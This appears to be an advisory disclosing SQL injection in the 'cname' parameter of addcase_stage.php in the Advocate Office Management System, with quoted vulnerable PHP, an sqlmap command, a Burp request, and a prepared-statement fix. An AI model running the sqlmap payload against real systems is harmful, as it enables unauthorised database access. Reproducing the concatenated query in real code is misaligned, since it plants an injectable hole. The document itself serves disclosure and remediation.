https://www.sourcecodester.com/php/17280/advocate-office-management-system-free-download.html
v1.0
PHP, Apache, MySQL
http://127.0.0.1/kortex_lite/control/login.php
mayuri.infospace@gmail.com
admin
/control/addcase_stage.php
In this scenario, the value of user input (the cname parameter) is concatenated directly into an SQL query without any filtering and without a prepared statement, leaving the application vulnerable to SQL injection.
```php
// addcase_stage.php, lines 38-47 (intermediate lines omitted)
if (isset($_POST['add'])) {
    $cname = $_POST['cname'];   // raw POST value, no validation or escaping
    // ...
    // the value is interpolated straight into the SQL text
    $sql = "INSERT INTO case_stage(name,status) VALUES ('$cname','1')";
}
```

Payload:

```
sqlmap -r request.txt --current-user --batch --dbms mysql
```

Burp Request:
```http
POST /kortex_lite/control/addcase_stage.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 227
Cache-Control: max-age=0
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH69K8ihjhi62Hye9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/kortex_lite/control/addcase_stage.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ihtlup31vclhigou4q6if7fl1u
Connection: close

------WebKitFormBoundaryH69K8ihjhi62Hye9
Content-Disposition: form-data; name="cname"

1
------WebKitFormBoundaryH69K8ihjhi62Hye9
Content-Disposition: form-data; name="add"

------WebKitFormBoundaryH69K8ihjhi62Hye9--
```
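For comparison, the following is an added example (not code from the Advocate Office Management System project) showing the case-stage insert from addcase_stage.php first as the page quotes it and then rewritten with a mysqli prepared statement. It assumes an existing mysqli connection in `$conn`; the function names, the 100-character length limit and the error handling are this example's own choices, not the project's.

```php
<?php
declare(strict_types=1);

// Make mysqli throw exceptions instead of silently returning false.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Vulnerable form, as quoted from addcase_stage.php: the raw POST value becomes
// part of the SQL text, so a single quote in $cname changes the statement's
// structure. Kept here only to show what the fix replaces.
function build_insert_unsafe(string $cname): string
{
    return "INSERT INTO case_stage(name,status) VALUES ('$cname','1')";
}

// Hardened form: validate the value, then pass it as a bound parameter.
// The server receives the SQL and the data separately, so the value is stored
// literally whatever characters it contains. Returns the new row's id.
function add_case_stage(mysqli $conn, string $cname): int
{
    $cname = trim($cname);
    // Assumed policy: a stage name is 1-100 characters (not a project rule).
    if ($cname === '' || mb_strlen($cname) > 100) {
        throw new InvalidArgumentException('stage name must be 1-100 characters');
    }

    $stmt = $conn->prepare('INSERT INTO case_stage(name, status) VALUES (?, ?)');
    $status = 1;
    $stmt->bind_param('si', $cname, $status);   // 's' string, 'i' integer
    $stmt->execute();
    $id = (int) $conn->insert_id;
    $stmt->close();
    return $id;
}

// Handler wiring for the same form field names the page's request uses.
// $conn is assumed to be the application's existing mysqli connection.
if (isset($_POST['add'])) {
    try {
        $id = add_case_stage($conn, (string) ($_POST['cname'] ?? ''));
        header('Location: addcase_stage.php?added=' . $id);
        exit;
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

The bound parameter is the actual fix; the length check is defence in depth and does not substitute for it. Any other handler in the application that builds its query string the same way should get the same treatment, and with `MYSQLI_REPORT_STRICT` enabled a failed statement surfaces as an exception in the application log rather than a silently ignored `false`, which also makes probing of these endpoints easier to spot.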